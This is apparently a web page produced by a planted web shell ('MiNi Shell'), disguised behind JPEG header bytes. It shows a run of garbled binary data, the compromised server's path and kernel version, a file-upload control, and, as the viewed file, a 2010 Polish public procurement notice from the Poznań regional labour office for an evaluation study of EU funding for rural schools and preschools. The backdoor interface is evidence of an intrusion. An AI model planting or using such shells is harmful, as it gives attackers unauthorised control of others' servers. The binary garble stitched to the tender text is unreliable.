JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100920/256963-N-2010.html

<p class="kh_header"><b>Poznań: Przeprowadzenie badania ewaluacyjnego pn.: Wpływ dofinansowania z EFS w ramach Priorytetu IX PO KL na rozwój oferty edukacyjnej szkół i upowszechnienie edukacji przedszkolnej na terenach wiejskich i w gminach miejsko-wiejskich oraz miastach do 25 tys. mieszkańców w województwie wielkopolskim</b><br>
<b>Numer ogłoszenia: 256963 - 2010; data zamieszczenia: 20.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Poznaniu , ul. Kościelna 37, 60-537 Poznań, woj. wielkopolskie, tel. 061 8463819, faks 061 8463820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badania ewaluacyjnego pn.: Wpływ dofinansowania z EFS w ramach Priorytetu IX PO KL na rozwój oferty edukacyjnej szkół i upowszechnienie edukacji przedszkolnej na terenach wiejskich i w gminach miejsko-wiejskich oraz miastach do 25 tys. mieszkańców w województwie wielkopolskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie Wykonawcy w zakresie Przeprowadzenia badania ewaluacyjnego pn.: Wpływ dofinansowania z EFS w ramach Priorytetu IX PO KL na rozwój oferty edukacyjnej szkół i upowszechnienie edukacji przedszkolnej na terenach wiejskich i w gminach miejsko-wiejskich oraz miastach do 25 tys. mieszkańców w województwie wielkopolskim.
Główne cele badania ewaluacyjnego to: 
1.	Analiza wpływu dofinansowania z EFS w ramach Priorytetu IX PO KL na rozwój oferty edukacyjnej szkół podstawowych, gimnazjalnych i ponadgimnazjalnych oraz na upowszechnienie edukacji przedszkolnej w gminach wiejskich, miejsko-wiejskich i miastach do 25 tys. mieszkańców w województwie wielkopolskim.
2.	Identyfikacja potrzeb oraz obszarów wymagających szczególnego wsparcia w ramach edukacji przedszkolnej, szkolnictwa podstawowego, gimnazjalnego i ponadgimnazjalnego (w tym zawodowego) na terenach wiejskich, w gminach miejsko-wiejskich i miastach do 25 tys. mieszkańców na terenie województwa wielkopolskiego.
UWAGA: Zamawiający używa zamiennie sformułowań: Wielkopolska i województwo wielkopolskie, które w przedmiotowym dokumencie są równoznaczne z terminem województwo wielkopolskie.
Od Wykonawcy oczekuje się uzyskania odpowiedzi na poniższe pytania badawcze:
1.	Czy dofinansowanie z EFS w ramach Priorytetu IX PO KL ma wpływ na rozszerzenie oferty edukacyjnej w szkołach podstawowych/ gimnazjalnych/ ponadgimnazjalnych w gminach wiejskich i miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców na terenie województwa wielkopolskiego? Jakiego rodzaju jest to wpływ i o jakiej sile?
2.	Czy dofinansowanie z EFS w ramach Priorytetu IX PO KL ma wpływ na upowszechnienie edukacji przedszkolnej na terenach wiejskich i miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców województwa wielkopolskiego? W jakim stopniu ten wpływ jest widoczny?
3.	Czy i jakiego typu bariery w dostępie do edukacji przedszkolnej występują na terenach gmin wiejskich, miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców w województwie wielkopolskim?
4.	Czy i w jakim stopniu dofinansowanie w ramach PO KL niweluje te bariery? Jakie działania podejmowane w ramach PO KL niwelują zidentyfikowane bariery? 
5.	Czy i w jakim stopniu zajęcia pozalekcyjne w wielkopolskich szkołach podstawowych/ gimnazjalnych i ponadgimnazjalnych finansowane ze środków EFS w ramach Priorytetu IX PO KL mają wpływ na wyrównywanie szans edukacyjnych uczniów napotykających na problemy edukacyjne z gmin wiejskich, miejsko - wiejskich oraz miast do 25 tys. mieszkańców?
6.	Czy i w jakim stopniu działania realizowane w ramach Priorytetu IX PO KL mają wpływ na powrót do systemu szkolnictwa dzieci, które przedwcześnie opuściły ścieżkę edukacji szkolnej?
7.	Czy i w jakim stopniu działania podejmowane w ramach Priorytetu IX PO KL w województwie wielkopolskim mają wpływ na zmianę wizerunku szkolnictwa zawodowego zarówno wśród uczniów szkół podstawowych i gimnazjalnych, a także wśród pracodawców?
8.	Czy i w jakim zakresie działania podejmowane w ramach Priorytetu IX PO KL mają wpływ na modyfikację kierunków kształcenia w szkolnictwie zawodowym?
9.	Czy wsparcie w ramach Priorytetu IX PO KL w wystarczającym stopniu wpływa na poprawę zaopatrzenia w pomoce naukowe dla szkół podstawowych/ gimnazjalnych/ ponadgimnazjalnych w gminach wiejskich, miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców na terenie Wielkopolski? W jaki sposób zwiększyć efektywność tego wsparcia?
10.	Czy i w jaki sposób dofinansowanie w ramach Priorytetu IX PO KL wpływa na podwyższenie kwalifikacji kadry pedagogicznej w przedszkolach i szkołach na terenie wielkopolskich gmin wiejskich i miejsko- wiejskich oraz miast do 25 tys. mieszkańców?
11.	Czy i w jakim stopniu dofinansowanie w ramach Priorytetu IX PO KL wpłynęło na uelastycznienie godzin otwarcia przedszkoli w wielkopolskich gminach wiejskich i miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców? W jaki sposób można zwiększyć wpływ EFS w tym zakresie? W których subregionach Wielkopolski są największe potrzeby w tym zakresie?
12.	Czy i w jakim stopniu dofinansowanie w ramach Priorytetu IX PO KL wpłynęło na uatrakcyjnienie oferty edukacyjnej i doposażenie przedszkoli w wielkopolskich gminach wiejskich, miejsko-wiejskich oraz miastach do 25 tys. mieszkańców? Na jakich obszarach Wielkopolski oraz w jakim zakresie istnieje potrzeba uelastycznienia oferty edukacyjnej oraz doposażenia przedszkoli?
13.	Czy i w jakim stopniu działania podjęte w ramach Priorytetu IX PO KL wpłynęły na zwiększenie liczby i kwalifikacji wychowawców/ nauczycieli zatrudnionych w przedszkolach/ szkołach wiejskich, miejsko-wiejskich i miastach do 25 tys. mieszkańców w Wielkopolsce?
14.	Czy i w jakim stopniu projekty realizowane w ramach Priorytetu IX PO KL na terenach wiejskich i gminach miejsko-wiejskich oraz miastach do 25 tys. mieszkańców w Wielkopolsce wpłynęły na poprawę wsparcia pedagogiczno-psychologicznego skoncentrowanego na eliminacji czynników lokujących uczniów w niekorzystnej sytuacji edukacyjnej?
15.	Czy i w jakim stopniu dzięki dofinansowaniu z EFS rozwinięto ofertę ukierunkowaną na rozwój kompetencji kluczowych  w szkołach podstawowych/ gimnazjalnych i ponadgimnazjalnych w gminach wiejskich, miejsko-wiejskich oraz w miastach do 25 tys. mieszkańców na terenie Wielkopolski?
16.	Jakie programy rozwojowe uwzględnione w Szczegółowym Opisie Priorytetów PO KL są najczęściej realizowane przez Beneficjentów Poddziałania 9.1.2 oraz Działania 9.2 PO KL w województwie wielkopolskim? Z czego to wynika?
17.	Czy i w jakim stopniu działania podejmowane w ramach Priorytetu IX PO KL miały wpływ na współpracę szkół i placówek kształcenia zawodowego z przedsiębiorcami i instytucjami rynku pracy (staże/praktyki) w Wielkopolsce?
Od Wykonawcy oczekuje się przedstawienia pytań badawczych w blokach tematycznych korespondujących z celami badawczymi oraz przyporządkowanie ich do metod badawczych i kryteriów ewaluacyjnych. 
W badaniu zostaną uwzględnione kryteria:
Adekwatność/ trafność - kryterium to pozwoli ocenić czy wsparcie udzielane w ramach Priorytetu IX PO KL jest adekwatne do potrzeb edukacyjnych mieszkańców gmin wiejskich, miejsko-wiejskich i miast do 25 tys. mieszkańców w województwie wielkopolskim.
Efektywność - kryterium to pozwoli ocenić stosunek poniesionych nakładów na Priorytet IX PO KL do uzyskanych rezultatów.
Użyteczność - kryterium to pozwoli ocenić, czy dofinansowanie z PO KL ma rzeczywisty wpływ na rozwój oferty edukacyjnej i upowszechnianie edukacji przedszkolnej na terenach wiejskich, w gminach miejsko-wiejskich i miastach do 25 tys. mieszkańców.
Wyniki ewaluacji służyć będą modyfikacji i dostosowaniu sposobów realizacji celów Priorytetu IX założonych dla komponentu regionalnego PO KL do potrzeb. Wyniki badania usprawnią wdrażanie PO KL w regionie oraz polepszą dynamikę osiągania wskaźników w ramach Priorytetu IX.
UWAGA: Analizy prowadzone przez Ewaluatora powinny uwzględniać dane dotyczące województwa wielkopolskiego od początku wdrażania komponentu regionalnego PO KL.

Metodologia
Wykonawca zobowiązany jest do przedstawienia w ofercie, a następnie w raporcie metodologicznym metod badawczych oraz analizy statystycznej i jakościowej uzyskanych danych.
Zamawiający wymaga, aby Wykonawca przedstawił w ofercie, a następnie w raporcie metodologicznym model badania uwzględniający powiązanie: celów badania, pytań badawczych, prób badawczych, metod i technik badawczych. Ponadto Wykonawca jest zobowiązany do przypisania grup respondentów do metod i technik badawczych. Zaproponowana koncepcja badawcza musi korespondować z kryteriami ewaluacyjnymi przedstawionymi w dokumencie.
Respondenci:
-Przedstawiciele (dyrektorzy, kierownicy, pracownicy merytoryczni) przedszkoli/ innych form edukacji przedszkolnej - Beneficjenci Priorytetu IX;
-Rodzice dzieci (Beneficjentów Ostatecznych) w wieku przedszkolnym (3-5 lat); 
-Przedstawiciele (dyrektorzy, nauczyciele) szkół podstawowych, gimnazjalnych, ponadgimnazjalnych - Beneficjenci Priorytetu IX;
-Uczniowie szkół podstawowych, gimnazjalnych, ponadgimnazjalnych - Beneficjenci Ostateczni; 
-Przedstawiciele Powiatowych Urzędów Pracy województwa wielkopolskiego;
-Przedstawiciel Departamentu Edukacji i Nauki UMWW;
-Przedstawiciel Departamentu Rolnictwa i Rozwoju Wsi UMWW;
-Kierownik Oddziału dla Priorytetu IX PO KL (WUP);
-Przedstawiciel Wydziału Polityki Rynku Pracy (WUP);
-Mieszkańcy gmin wiejskich, miejsko-wiejskich, miast do 25 tys. mieszkańców;
-Wielkopolscy przedsiębiorcy/ pracodawcy.
Zamawiający wymaga zastosowania wymienionych poniżej metod i technik:
-Desk research - 1 analiza;
-CATI - 500 ankiet;
-IDI - 10 wywiadów;
-FGI - 1 zogniskowany wywiad grupowy.
Zaproponowane przez Wykonawcę metody i techniki ich wykorzystania, charakterystyka i dobór respondentów do prób oraz kryteria przypisania metod do poszczególnych pytań badawczych zostaną przedstawione Zamawiającemu przez Wykonawcę w ofercie, a następnie w raporcie metodologicznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia, nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Sposób realizacji badania - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje dokonanie zmiany umowy w zakresie składu osobowego kadry realizującej przedmiot umowy i ekspertów oraz zastosowanych metod i technik badawczych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJEWÓDZKI URZĄD PRACY W POZNANIU
ul. Kościelna 37
60-537 Poznań
IIp. pok. 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 09:20, miejsce: WOJEWÓDZKI URZĄD PRACY W POZNANIU
ul. Kościelna 37
60-537 Poznań
IIp. pok. 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.10.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Pomocy Technicznej Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com